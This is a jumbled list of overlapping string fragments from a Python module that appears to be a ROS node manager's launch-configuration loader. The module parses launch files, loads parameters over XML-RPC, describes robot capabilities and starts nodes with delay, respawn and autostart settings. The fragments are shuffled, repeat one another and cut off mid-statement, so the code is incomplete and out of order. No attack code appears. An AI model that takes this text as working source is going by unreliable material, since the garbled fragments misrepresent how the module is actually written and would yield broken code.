"roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise StartException(str(e)) except Exception as",
"BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #",
"dr.capabilities.append(cap) # load parameters into the ROS parameter server if self.load_params_at_start: self.loadParams() #",
"%s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" %",
"used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace # set",
"# start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env,",
"and decode the string entry from system default coding to unicode. @param val:",
"threading.Timer(delay_service_creation, self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if",
"descr_dict['type'] cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load",
"''' Replaces the '\\\\n' by LF (Line Feed) and decode the string entry",
"of the node cwd = self.get_ros_home() if not (n.cwd is None): if n.cwd",
"'' elif not rosgraph.names.is_global(topic): topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def",
"argv=argv) # create the list with node names for item in self.roscfg.nodes: if",
"itemname == node: n = item break if n is None: raise StartException(\"Node",
"empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv) # create",
"break if not start_now: # Start the timer for waiting for the topic",
"caller about a new configuration. ''' self.listService = None '''@ivar: The service will",
"reserved. # # Redistribution and use in source and binary forms, with or",
"== 'ROS_HOME': cwd = self.get_ros_home() elif n.cwd == 'node': cwd = os.path.dirname(cmd[0]) respawn",
"Copyright (c) 2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. # # Redistribution",
"if the given file is not found ''' launch_file = path # if",
"binary form must reproduce the above # copyright notice, this list of conditions",
"respawn_max = rospy.names.ns_join(node, 'respawn/max') respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try:",
"= rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass",
"set the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0:",
"printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(), p.key, p.value) r = param_server_multi() for code, msg, _",
"\"\\n\") try: result = result.decode(sys.getfilesystemencoding()) except: pass return result def getCapabilitiesDesrc(self): ''' Parses",
"in the given package. If more then one launch file with the same",
"parameter self.launch_file = rospy.get_param('~launch_file', '') rospy.loginfo(\"launch_file: %s\" % self.launch_file) self.package = rospy.get_param('~package', '')",
"without # modification, are permitted provided that the following conditions # are met:",
"# if self.nodes: # self.runService = rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes',",
"= True break if ':=' not in a or in_filter: continue result.append(a) return",
"= item break if n is None: raise StartException(\"Node '%s' not found!\" %",
"'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO: env-loader support? # if machine.env_args: #",
"configuration. ''' self.description_response = ListDescriptionResponse() # variables to print the pending autostart nodes",
"= rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) except: import traceback print(traceback.format_exc()) def getPath(self, path, package=''): '''",
"launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the services to inform",
"def rosservice_start_node(self, req): ''' Callback for the ROS service to start a node.",
"self._timed_service_creation) t.start() else: self._timed_service_creation() # self.timer = rospy.Timer(rospy.Duration(2), self.timed_service_creation, True) # if self.nodes:",
"is found, take the first one launch_file = paths[0] if os.path.isfile(launch_file) and os.path.exists(launch_file):",
"':=' not in a or in_filter: continue result.append(a) return result def load(self, delay_service_creation=0.):",
"launch_path = self.getPath(self.launch_file, self.package) rospy.loginfo(\"loading launch file: %s\", launch_path) self.masteruri = self._masteruri_from_ros() self.roscfg",
"from this software without specific prior written permission. # # THIS SOFTWARE IS",
"# notice, this list of conditions and the following disclaimer. # * Redistributions",
"package: the package containing the launch file or an empty string, if the",
"ROS HOME path depending on ROS distribution API. @return: ROS HOME path @rtype:",
"the node @type node: C{str} @raise StartException: if an error occurred while start.",
"machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address): self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) else: self.nodes.append(roslib.names.ns_join(item.namespace, item.name)) # get the",
"to avoid load the launchfile info local namespace sys.argv = list(argv) # set",
"DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription,",
"the decoded string @rtype: C{unicode} or original on error ''' result = val.replace(\"\\\\n",
"'' self.file = '' self.__lock = threading.RLock() # Load parameter self.launch_file = rospy.get_param('~launch_file',",
"# add new group in the namespace of the node if ns not",
"autostart required topic `%s` is ignored!' % topic) topic = '' elif not",
"found!' % (filename, pkg)) return cmd def _get_start_exclude(self, node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude')",
"(type, name, text) ''' self.package = '' self.file = '' self.__lock = threading.RLock()",
"string_types = (str,) if isinstance(cmd, string_types): cmd = [cmd] if cmd is None",
"INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS",
"Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import",
"param, p in self.roscfg.params.items(): if param.endswith('robots'): if isinstance(p.value, list): if len(p.value) > 0",
"'images', 'description'] -> ignore\", param) else: for entry in p.value: try: print(entry[0], rospy.get_param('/mastername',",
"rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv: %s\" % self.argv) if",
"each load of a launch file to inform the caller about a new",
"self.package = '' self.file = '' self.__lock = threading.RLock() # Load parameter self.launch_file",
"variables to print the pending autostart nodes self._pending_starts = set() self._pending_starts_last_printed = set()",
"import traceback print(traceback.format_exc()) import roslib.rosenv return roslib.rosenv.get_ros_home() @classmethod def _load_parameters(cls, masteruri, params, clear_params):",
"= False # start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd,",
"= rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def _get_start_delay(self, node):",
"of (type, name, text) ''' self.package = '' self.file = '' self.__lock =",
"style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify",
"afilter: if a.startswith(f): in_filter = True break if ':=' not in a or",
"cap_param = roslib.names.ns_join(node_fullname, 'capability_group') cap_ns = node_fullname # find the capability group parameter",
"written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND",
"topic = rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node): result =",
"THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #",
"sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if machine in",
"an error occurred while start. ''' if not self.parameter_loaded: self.loadParams() n = None",
"cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required =",
"[\"%s\" % self.argv] sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services",
"if n.machine_name and not n.machine_name == 'localhost': # machine = self.roscfg.machines[n.machine_name] # TODO:",
"True break if not start_now: # Start the timer for waiting for the",
"'%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart",
"dr.robot_descr = self._decode(entry[4]) break except: pass # get the sensor description tmp_cap_dict =",
"first one was started! Exceutables:\\n%s' % str(cmd)) def _run_node(self, cmd, cwd, env, node,",
"launch_file) if len(paths) > 0: # if more then one launch file is",
"* Neither the name of Fraunhofer nor the names of its # contributors",
"== 'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie',",
"clear params to prevent error for p in clear_params: param_server_multi.deleteParam(rospy.get_name(), p) r =",
"group parameter found, assign node to the group if not cap_ns: cap_ns =",
"n is None: raise StartException(\"Node '%s' not found!\" % node) if autostart and",
"subprocess.Popen(cmd, cwd=cwd, env=env) # wait for process to avoid 'defunct' processes thread =",
"pass return topic def _get_respawn_params(self, node): result = {'max': 0, 'min_runtime': 0, 'delay':",
"software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY",
"rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']: return roslib.rosenv.get_master_uri() else:",
"is used in cpp plugins in rqt if n.namespace: new_env['ROS_NAMESPACE'] = n.namespace #",
"0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd = [respawn[0], prefix, cmd[0]] cmd_args = [ScreenHandler.getSceenCmd(node)]",
"parameter in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns",
"# except: # import traceback # print traceback.format_exc() if self.do_autostart: if not self.parameter_loaded:",
"from system default coding to unicode. @param val: the string coding as system",
"in self.roscfg.machines: machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict",
"THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE",
"rospy.get_param('/mastername', ''): dr.robot_name = self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr =",
"param_server_multi.deleteParam(rospy.get_name(), p) r = param_server_multi() # for code, msg, _ in r: #",
"list, skip autostart\", n.name) return # env = n.env_args prefix = n.launch_prefix if",
"multi-call objects are not reusable param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): #",
"in namespace while cap_param not in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns =",
"in r: # if code != 1: # raise StartException(\"Failed to clear parameter:",
"import xmlrpclib except ImportError: import xmlrpc.client as xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p =",
"from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse #",
"self.nodes = [] # the name of nodes with namespace self.sensors = {}",
"environment to empty namespace os.environ[ROS_NAMESPACE] = rospy.names.SEP rospy.set_param('~argv_used', list(set(argv))) loader.load(launch_path, self.roscfg, verbose=False, argv=argv)",
"if start_required == topic: start_now = True break if not start_now: # Start",
"rospy.logwarn(\"Error while start %s: %s\", n, e) self.do_autostart = False def _decode(self, val):",
"n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] > 0: n.env_args.append(('RESPAWN_DELAY', '%d' % respawn_params['delay'])) node_cmd",
"= ['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a in argv: in_filter",
"[] for a in argv: in_filter = False for f in afilter: if",
"= list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter server if self.load_params_at_start:",
"for code, msg, _ in r: # if code != 1: # raise",
"# rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node,",
"2012, Fraunhofer FKIE/US, <NAME> # All rights reserved. # # Redistribution and use",
"self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip autostart rospy.loginfo(\"%s is in exclude list, skip autostart\", n.name)",
"n.name] if not (n.cwd is None): args.append('__cwd:=%s' % n.cwd) # add remaps for",
"package if package: paths = roslib.packages.find_resource(package, launch_file) if len(paths) > 0: # if",
"the respawn environment variables respawn_params = self._get_respawn_params(rospy.names.ns_join(n.namespace, n.name)) if respawn_params['max'] > 0: n.env_args.append(('RESPAWN_MAX',",
"xmlrpclib param_server = xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc param_server_multi",
"self.roscfg = ROSLaunchConfig() loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from",
"description. ''' return self.description_response def loadParams(self): ''' Loads all parameter into ROS parameter",
": [str]))))} ''' result = dict() capabilies_descr = dict() if self.roscfg is not",
"group, descr_dict in group_dict.items(): if descr_dict['nodes']: cap = Capability() cap.namespace = ns cap.name",
"occurred while start. ''' if not self.parameter_loaded: self.loadParams() n = None for item",
"roslib.packages.find_node(pkg, filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise StartException(str(e))",
"_ in r: if code != 1: raise StartException(\"Failed to set parameter: %s\"",
"to get the list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req):",
"default coding to unicode. @param val: the string coding as system default @type",
"get the capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name",
"params[param] = value # rospy.loginfo(\"register PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True",
"self.roscfg.params[param_name].value if rosgraph.names.is_private(topic): rospy.logwarn('Private for autostart required topic `%s` is ignored!' % topic)",
"file or an empty string, if the C{file} is an absolute path @type",
"'%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay']",
"create the list with node names for item in self.roscfg.nodes: if item.machine_name and",
"roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns = item.namespace.rstrip(roslib.names.SEP) # if the parameter",
"start_now = False # start timer for delayed start start_timer = threading.Timer(start_delay, self._run_node,",
"None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter",
"p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description': self._decode(entry[3])} # get the capability",
"set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name), autostart) if len(cmd) >",
"= rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv',",
"# multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces #",
"a node. ''' self.runNode(req.node) return [] def rosservice_reload(self, req): self.load(2.) return [] #",
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED",
"new_env['ROS_NAMESPACE'] = n.namespace # set delayed autostart parameter self._run_node(popen_cmd, cwd, new_env, rospy.names.ns_join(n.namespace, n.name),",
"entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except: pass # get the sensor description tmp_cap_dict",
"if ns == cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break",
"the caller about a new configuration. ''' self.description_response = ListDescriptionResponse() # variables to",
"result.append(a) return result def load(self, delay_service_creation=0.): ''' Load the launch file configuration '''",
"int(self.roscfg.params[respawn_delay].value) except: pass return result def get_ros_home(self): ''' Returns the ROS HOME path",
".screen_handler import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception throwing while",
"rospy.get_param('~autostart', False) rospy.loginfo(\"do_autostart: %s\" % self.do_autostart) self.load_params_at_start = rospy.get_param('~load_params_at_start', True) self.parameter_loaded = False",
"'type', 'name', 'images', 'description'] -> ignore\", param) else: for entry in p.value: try:",
"import ScreenHandler # , ScreenHandlerException class LoadException(Exception): ''' The exception throwing while searching",
"roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService = rospy.Service('~run',",
"the 'BASH_ENV' and 'ENV' from environment new_env = dict(os.environ) try: for k in",
"print(\"WRONG format, expected: ['host(ROS master Name)', 'type', 'name', 'images', 'description'] -> ignore\", param)",
"coding to unicode. @param val: the string coding as system default @type val:",
"self.get_ros_home() if not (n.cwd is None): if n.cwd == 'ROS_HOME': cwd = self.get_ros_home()",
"filename) except roslib.packages.ROSPkgException as e: # multiple nodes, invalid package raise StartException(str(e)) except",
"autostart=False): self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart",
"use two separate loops, to create the description list first for param, p",
"or without # modification, are permitted provided that the following conditions # are",
"= [cmd] if cmd is None or len(cmd) == 0: raise StartException('%s in",
"True) self.parameter_loaded = False rospy.loginfo(\"load_params_at_start: %s\" % self.load_params_at_start) self.argv = rospy.get_param('~argv', []) rospy.loginfo(\"argv:",
"loader = XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv to avoid",
"# def rosservice_load_launch(self, req): # ''' # Load the launch file # '''",
"params.itervalues(): # suppressing this as it causes too much spam # printlog(\"setting parameter",
"loadParams(self): ''' Loads all parameter into ROS parameter server. ''' params = dict()",
"dict() for (ns, groups) in result[machine_name].items(): if ns == cap_ns and p.value in",
"rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except: pass try: result['min_runtime'] = int(self.roscfg.params[respawn_min_runtime].value) except:",
"the capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace, item.name) machine_name =",
"# self.__lock.release() # return [] def rosservice_description(self, req): ''' Returns the current description.",
"machine = self.roscfg.machines[machine].address if not machine or roslib.network.is_local_address(machine): for ns, group_dict in ns_dict.items():",
"self.listService is not None: self.listService.shutdown('reload config') self.listService = None self.nodes = [] #",
"the package containing the launch file or an empty string, if the C{file}",
"and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not added: ns",
"string @rtype: C{unicode} or original on error ''' result = val.replace(\"\\\\n \", \"\\n\")",
"= xmlrpclib.MultiCall(param_server) # clear specified parameter namespaces # #2468 unify clear params to",
"a in argv: in_filter = False for f in afilter: if a.startswith(f): in_filter",
"= {'type': capabilies_descr[p.value]['type'], 'images': capabilies_descr[p.value]['images'], 'description': capabilies_descr[p.value]['description'], 'nodes': []} except: result[machine_name][ns][p.value] = {'type':",
"node_cmd cmd_args.append(n.args) cmd_args[len(cmd_args):] = args # print 'runNode: ', cmd_args popen_cmd = shlex.split(str('",
"from __future__ import print_function from multimaster_msgs_fkie.msg import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes,",
"roslib.network import rospy import shlex import std_srvs.srv import subprocess import sys import threading",
"set parameter: %s\" % (msg)) except Exception: raise # re-raise as this is",
"for grouping the nodes. @return: the capabilities description stored in this configuration @rtype:",
"# if more then one launch file is found, take the first one",
"conditions # are met: # # * Redistributions of source code must retain",
"start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and start_required: start_now = False",
"name of nodes with namespace self.sensors = {} # sensor descriptions launch_path =",
"ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE",
"error occurred while start. ''' if not self.parameter_loaded: self.loadParams() n = None for",
"cap_ns = roslib.names.SEP cap_param = roslib.names.ns_join(cap_ns, 'capability_group') if cap_ns == node_fullname: cap_ns =",
"'node': cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn')",
"self.roscfg.nodes: if item.machine_name and not item.machine_name == 'localhost': machine = self.roscfg.machines[item.machine_name] if roslib.network.is_local_address(machine.address):",
"types str or array of string if sys.version_info[0] <= 2: import types string_types",
"respawn_min_runtime = rospy.names.ns_join(node, 'respawn/min_runtime') respawn_delay = rospy.names.ns_join(node, 'respawn/delay') try: result['max'] = int(self.roscfg.params[respawn_max].value) except:",
"to unicode. @param val: the string coding as system default @type val: str",
"the distribution. # * Neither the name of Fraunhofer nor the names of",
"support? # if machine.env_args: # env[len(env):] = machine.env_args # nm.screen().testScreen() cmd = self._get_node(n.package,",
"get the sensor description tmp_cap_dict = self.getCapabilitiesDesrc() for machine, ns_dict in tmp_cap_dict.items(): if",
"topic start_timer = threading.Timer(3., self._run_node, args=(cmd, cwd, env, node, autostart)) start_timer.start() if start_now",
"and len(p.value[0]) != 4: print(\"WRONG format, expected: ['name', 'type', 'images', 'description'] -> ignore\",",
"argv = self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load the launchfile",
"item.namespace.rstrip(roslib.names.SEP) # if the parameter group parameter found, assign node to the group",
"self.__lock.acquire() # self.load(req.package, req.file, req.argv) # finally: # self.__lock.release() # return [] def",
"parameter server. ''' params = dict() for param, value in self.roscfg.params.items(): params[param] =",
"StartException(Exception): ''' The exception throwing while run a node containing in the loaded",
"empty string, if the C{file} is an absolute path @type package: C{str} @return:",
"self._decode(entry[3])} # get the capability nodes for item in self.roscfg.nodes: node_fullname = roslib.names.ns_join(item.namespace,",
"clear specified parameter namespaces # #2468 unify clear params to prevent error for",
"== cap_ns and p.value in groups: groups[p.value]['nodes'].append(node_fullname) added = True break if not",
"PARAMS:\\n%s\", '\\n'.join(params)) self._load_parameters(self.masteruri, params, self.roscfg.clear_params) self.parameter_loaded = True def runNode(self, node, autostart=False): '''",
"param_server_multi = xmlrpclib.MultiCall(param_server) for p in params.itervalues(): # suppressing this as it causes",
"without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE",
"sys.argv to avoid load the launchfile info local namespace sys.argv = list(argv) #",
"the launch file in the given package. If more then one launch file",
"node: the name of the node @type node: C{str} @raise StartException: if an",
"group in the namespace of the node if ns not in result[machine_name]: result[machine_name][ns]",
"['__ns:=', '__name:=', '_package:=', '_launch_file:='] result = [] for a in argv: in_filter =",
"= XmlLoader() argv = self._filter_args(sys.argv) # remove namespace from sys.argv to avoid load",
"in self.roscfg.nodes: itemname = rospy.names.ns_join(item.namespace, item.name) if itemname == node: n = item",
"the capabilities description stored in this configuration @rtype: C{dict(machine : dict(namespace: dict(group:dict('type' :",
"else '' args = ['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd",
"ListNodesResponse # , LoadLaunch from rosgraph.rosenv import ROS_NAMESPACE from roslaunch import ROSLaunchConfig, XmlLoader",
"self.description_response = dr = ListDescriptionResponse() dr.robot_name = '' dr.robot_type = '' dr.robot_descr =",
"raise StartException(\"Failed to clear parameter: %s\"%(msg)) # multi-call objects are not reusable param_server_multi",
"param) else: for entry in p.value: capabilies_descr[entry[0]] = {'type': ''.join([entry[1]]), 'images': entry[2].split(','), 'description':",
"pass # add node environment parameter for k, v in n.env_args: new_env[k] =",
"params, clear_params): \"\"\" Load parameters onto the parameter server \"\"\" try: import xmlrpclib",
"OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO",
"a new configuration. if self.runService is not None: self.runService.shutdown('reload config') self.runService = None",
"exception throwing while searching for the given launch file. ''' pass class StartException(Exception):",
"None: self.listService.shutdown('reload config') self.listService = None self.nodes = [] # the name of",
"found, assign node to the group if cap_param in self.roscfg.params and self.roscfg.params[cap_param].value: p",
"the node with given name from the currently loaded configuration. @param node: the",
"start start_timer = threading.Timer(start_delay, self._run_node, args=(cmd, cwd, env, node, False)) start_timer.start() if start_now:",
"= {} '''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor name, sensor",
"if start_now and autostart and start_delay > 0: start_now = False # start",
"''' try: import rospkg.distro distro = rospkg.distro.current_distro_codename() if distro in ['electric', 'diamondback', 'cturtle']:",
"% str(cmd)) def _run_node(self, cmd, cwd, env, node, autostart=False): self._pending_starts.add(node) start_now = True",
"suppressing this as it causes too much spam # printlog(\"setting parameter [%s]\"%p.key) param_server_multi.setParam(rospy.get_name(),",
"string_types): cmd = [cmd] if cmd is None or len(cmd) == 0: raise",
"parameters into the ROS parameter server if self.load_params_at_start: self.loadParams() # initialize the ROS",
"cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters into the ROS parameter server if",
"p in params.itervalues(): # suppressing this as it causes too much spam #",
"is not None and not item.machine_name == 'localhost' else '' added = False",
"list): if len(p.value) > 0 and len(p.value[0]) != 5: print(\"WRONG format, expected: ['host(ROS",
"= ('', '', '') '''@ivar: robot description as tupel of (type, name, text)",
"# POSSIBILITY OF SUCH DAMAGE. from __future__ import print_function from multimaster_msgs_fkie.msg import Capability",
"except: return roslib.rosenv.get_master_uri() def _timed_service_creation(self): with self.__lock: try: if self.runService is None: self.runService",
"[%s] not found!' % (path, package)) def rosservice_list_nodes(self, req): ''' Callback for the",
"cwd = os.path.dirname(cmd[0]) respawn = [''] if n.respawn: respawn = self._get_node('node_manager_fkie', 'respawn') #",
"not item.machine_name == 'localhost' else '' added = False cap_param = roslib.names.ns_join(node_fullname, 'capability_group')",
"C{str} @return: the absolute path of the launch file @rtype: C{str} @raise LoadException:",
"['__ns:=%s' % n.namespace, '__name:=%s' % n.name] if not (n.cwd is None): args.append('__cwd:=%s' %",
"CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY,",
"spaces.''' self.sensors = {} '''@ivar: Sensor description: C{dict(node name : [(sensor type, sensor",
"autostart)) start_timer.start() if start_now and autostart and start_delay > 0: start_now = False",
"OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS",
"an absolute path @type package: C{str} @return: the absolute path of the launch",
"cmd_args popen_cmd = shlex.split(str(' '.join(cmd_args))) rospy.loginfo(\"run node '%s as': %s\", node, str(' '.join(popen_cmd)))",
"The exception throwing while searching for the given launch file. ''' pass class",
"@param package: the package containing the launch file or an empty string, if",
"StartException('%s in package [%s] not found!' % (filename, pkg)) return cmd def _get_start_exclude(self,",
"in self.roscfg.params and cap_param.count(roslib.names.SEP) > 1: cap_ns = roslib.names.namespace(cap_ns).rstrip(roslib.names.SEP) if not cap_ns: cap_ns",
"import Capability from multimaster_msgs_fkie.srv import ListDescription, ListNodes, Task, ListDescriptionResponse, ListNodesResponse # , LoadLaunch",
"process to avoid 'defunct' processes thread = threading.Thread(target=ps.wait) thread.setDaemon(True) thread.start() # remove from",
"n.name) return # env = n.env_args prefix = n.launch_prefix if n.launch_prefix is not",
"the ROS services # rospy.Service('~load', LoadLaunch, self.rosservice_load_launch) self._reload_service = rospy.Service('~reload', std_srvs.srv.Empty, self.rosservice_reload) rospy.Service('~description',",
"new group in the namespace of the node if ns not in result[machine_name]:",
"= self._decode(entry[2]) dr.robot_type = entry[1] dr.robot_images = entry[3].split(',') dr.robot_descr = self._decode(entry[4]) break except:",
"self._pending_starts.add(node) start_now = True start_delay = self._get_start_delay(node) start_required = self._get_start_required(node) if autostart and",
"# print the current pending autostarts if self._pending_starts_last_printed != self._pending_starts: self._pending_starts_last_printed.clear() self._pending_starts_last_printed.update(self._pending_starts) rospy.loginfo(\"Pending",
"_decode(self, val): ''' Replaces the '\\\\n' by LF (Line Feed) and decode the",
"isinstance(cmd, string_types): cmd = [cmd] if cmd is None or len(cmd) == 0:",
"a launch file to inform the caller about a new configuration. ''' self.listService",
"get the list with available nodes. ''' return ListNodesResponse(self.nodes) def rosservice_start_node(self, req): '''",
"package: C{str} @return: the absolute path of the launch file @rtype: C{str} @raise",
"= int(self.roscfg.params[respawn_min_runtime].value) except: pass try: result['delay'] = int(self.roscfg.params[respawn_delay].value) except: pass return result def",
"''' pass class StartException(Exception): ''' The exception throwing while run a node containing",
"ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT",
"sys.argv.extend(self.argv) if self.do_autostart: rospy.set_param('~autostart', False) # initialize the ROS services # rospy.Service('~load', LoadLaunch,",
"= rospy.names.ns_join(rosgraph.names.namespace(node), topic) except: pass return topic def _get_respawn_params(self, node): result = {'max':",
"% respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' % respawn_params['min_runtime'])) if respawn_params['delay'] >",
"> 0: n.env_args.append(('RESPAWN_MAX', '%d' % respawn_params['max'])) if respawn_params['min_runtime'] > 0: n.env_args.append(('RESPAWN_MIN_RUNTIME', '%d' %",
"environment parameter for k, v in n.env_args: new_env[k] = v # the ROS_NAMESPACE",
"node): param_name = rospy.names.ns_join(node, 'default_cfg/autostart/exclude') try: return bool(self.roscfg.params[param_name].value) except: pass return False def",
"cap.images = list(descr_dict['images']) cap.description = descr_dict['description'] cap.nodes = list(descr_dict['nodes']) dr.capabilities.append(cap) # load parameters",
"= xmlrpclib.ServerProxy(masteruri) p = None try: # multi-call style xmlrpc param_server_multi = xmlrpclib.MultiCall(param_server)",
"''' Load the launch file configuration ''' with self.__lock: self._pending_starts.clear() # shutdown the",
"StartException(\"Node '%s' not found!\" % node) if autostart and self._get_start_exclude(rospy.names.ns_join(n.namespace, n.name)): # skip",
"= rospy.Service('~run', Task, self.rosservice_start_node) # self.listServic = rospy.Service('~list_nodes', ListNodes, self.rosservice_list_nodes) # except: #",
"while run a node containing in the loaded configuration. ''' pass class DefaultCfg(object):",
"try: self._pending_starts.remove(node) except: pass # print the current pending autostarts if self._pending_starts_last_printed !=",
"# initialize the ROS services # HACK to let the node_manager to update",
"pending autostarts try: self._pending_starts.remove(node) except: pass # print the current pending autostarts if",
"source and binary forms, with or without # modification, are permitted provided that",
"for topic, datatype in master.getPublishedTopics(''): if start_required == topic: start_now = True break",
"LoadException: if the given file is not found ''' launch_file = path #",
"# disclaimer in the documentation and/or other materials provided # with the distribution.",
